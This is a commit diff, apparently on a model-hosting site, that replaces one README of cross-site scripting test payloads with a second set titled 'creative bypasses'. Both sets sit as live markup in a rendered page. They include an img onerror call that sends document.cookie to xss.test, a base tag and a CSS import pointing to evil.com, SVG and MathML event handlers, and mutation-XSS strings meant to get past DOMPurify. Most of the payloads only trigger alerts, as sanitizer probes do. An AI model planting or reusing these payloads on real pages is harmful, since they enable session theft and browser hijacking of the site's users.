FIRSTACCOUNT69 commited on
Commit
a5da306
·
verified ·
1 Parent(s): f5139fc

XSS round 2 - creative bypasses

Browse files
Files changed (1) hide show
  1. README.md +37 -51
README.md CHANGED
@@ -1,71 +1,57 @@
1
  ---
2
  license: mit
3
  ---
4
- # XSS Test Model
5
 
6
- ## Normal content first
 
7
 
8
- This is a test model with various XSS payloads embedded.
 
9
 
10
- ## Test 1: Image onerror
11
- <img src=x onerror="fetch('https://xss.test/'+document.cookie)">
12
 
13
- ## Test 2: SVG onload
14
- <svg onload="alert(1)">
15
 
16
- ## Test 3: Details/Summary
17
- <details open ontoggle="alert('details')">
18
- <summary>Click</summary>
19
- test
20
- </details>
21
 
22
- ## Test 4: Math tag
23
- <math><mi xlink:href="javascript:alert(1)">test</mi></math>
24
 
25
- ## Test 5: Video
26
- <video src=x onerror="alert('video')">
27
 
28
- ## Test 6: Marquee
29
- <marquee onstart="alert('marquee')">test</marquee>
30
 
31
- ## Test 7: Input autofocus
32
- <input autofocus onfocus="alert('input')">
33
 
34
- ## Test 8: Body
35
- <body onload="alert('body')">
36
 
37
- ## Test 9: iframe srcdoc
38
- <iframe srcdoc="<script>alert('iframe')</script>">
39
 
40
- ## Test 10: Object data
41
- <object data="javascript:alert('object')">
 
42
 
43
- ## Test 11: Link tag
44
- <link rel="import" href="data:text/html,<script>alert('link')</script>">
45
 
46
- ## Test 12: Style injection
47
- <div style="background:url('javascript:alert(1)')">styled</div>
48
 
49
- ## Test 13: Custom element
50
- <custom-tag onmouseover="alert('custom')">hover me</custom-tag>
 
51
 
52
- ## Test 14: Anchor with JS
53
- [Click me](javascript:alert('anchor'))
54
 
55
- ## Test 15: Markdown image with JS
56
- ![alt](javascript:alert('mdimg'))
57
-
58
- ## Test 16: HTML entity bypass
59
- <img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>
60
-
61
- ## Test 17: Data URI
62
- <a href="data:text/html,<script>alert(1)</script>">data uri</a>
63
-
64
- ## Test 18: Form action
65
- <form action="javascript:alert('form')"><button>Submit</button></form>
66
-
67
- ## Test 19: Meta refresh
68
- <meta http-equiv="refresh" content="0;url=javascript:alert('meta')">
69
-
70
- ## Test 20: Template
71
- <template><script>alert('template')</script></template>
 
1
  ---
2
  license: mit
3
  ---
4
+ # XSS Round 2
5
 
6
+ ## Test A: SVG animate
7
+ <svg><animate onbegin="alert(1)" attributeName="x" dur="1s">
8
 
9
+ ## Test B: SVG set
10
+ <svg><set attributeName="onmouseover" to="alert(1)">
11
 
12
+ ## Test C: SVG foreignObject
13
+ <svg><foreignObject><body onload="alert(1)"></body></foreignObject></svg>
14
 
15
+ ## Test D: SVG use external
16
+ <svg><use href="data:image/svg+xml,<svg onload=alert(1)>"></use></svg>
17
 
18
+ ## Test E: Style tag
19
+ <style>body{background:red}</style>
 
 
 
20
 
21
+ ## Test F: Base tag
22
+ <base href="https://evil.com/">
23
 
24
+ ## Test G: Object with SVG
25
+ <embed src="data:image/svg+xml,<svg onload=alert(1)>">
26
 
27
+ ## Test H: Anchor target
28
+ <a href="https://evil.com" target="_blank" rel="">Click me</a>
29
 
30
+ ## Test I: noscript
31
+ <noscript><img src=x onerror=alert(1)></noscript>
32
 
33
+ ## Test J: CSS import
34
+ <style>@import url("https://evil.com/steal.css")</style>
35
 
36
+ ## Test K: MathJax/KaTeX
37
+ $$\href{javascript:alert(1)}{click}$$
38
 
39
+ ## Test L: Tab/newline bypass
40
+ <img src=x on error="alert(1)">
41
+ <a hre f="javascript:alert(1)">test</a>
42
 
43
+ ## Test M: HTML comment bypass
44
+ <img src=x onerror="alert(1)"--!>
45
 
46
+ ## Test N: Mutation XSS
47
+ <svg><style><img src=x onerror=alert(1)>
48
 
49
+ ## Test O: DOMPurify bypass attempts
50
+ <math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
51
+ <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">
52
 
53
+ ## Test P: noembed
54
+ <noembed><img src=x onerror=alert(1)></noembed>
55
 
56
+ ## Test Q: Title element
57
+ <svg><title><img src=x onerror=alert(1)></title></svg>